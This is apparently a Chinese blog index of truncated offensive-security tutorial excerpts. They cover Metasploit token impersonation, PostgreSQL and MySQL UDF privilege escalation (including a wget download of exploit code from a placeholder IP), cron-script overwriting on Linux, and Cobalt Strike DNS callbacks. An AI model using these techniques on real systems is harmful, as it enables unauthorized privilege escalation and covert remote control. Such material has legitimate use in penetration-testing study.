MSF令牌窃取(针对2008以前的机器,很老的方法)

拿到低权限shell后,使用use incgnito模块命令use incgninto 查看可以窃取的权限如果返回结果中有可以窃取的SYSTEM权限,我们执行impersonate_token "NTAUTHORITYSYSTEM"进...

postgre数据库 提权 cve-2019-9193、CVE-2018-1058

postgre数据库(默认端口5432) 提权 cve-2019-9193、CVE-2018-1058漏洞提权过程: 连接-利用漏洞-执行-提权postgre执行以下命令DROP TABLE IF EXISTS cmd_exec; ...

linux权限提升-利用不安全的权限分配操作导致的计划任务覆盖

管理员创建了一个计划任务任务内容是定时备份文件,定期执行。但是备份文件脚本在执行命令备份时候,需要给脚本赋值运行权限,如果管理员给文件赋值的权限是所有权(所有人都可以修改、删除的权限)的话,我们可以直接对管理员创建的脚本文件内容进行膝...

Linux MYSQL数据库提权

1、利用MYSQL udf POC编译下载1158expwget http://xxx.xxx.xxx.xxx/1158修改1158文件修改为raptor.cmv 1158 raptor.c然后gcc编译为成.so文件gcc -g -...

cobal strike 木马dns 协议上线

cobal strike 木马dns 协议上线首先,我们需要一个外网的服务器和一个注册好的域名1、准备我的阿里云域名,设置DNS解析如下。(注意:VPS 的 53 端口一定要在防火墙上面对外开放)我这里用的国外服务器,如果用的是阿里云...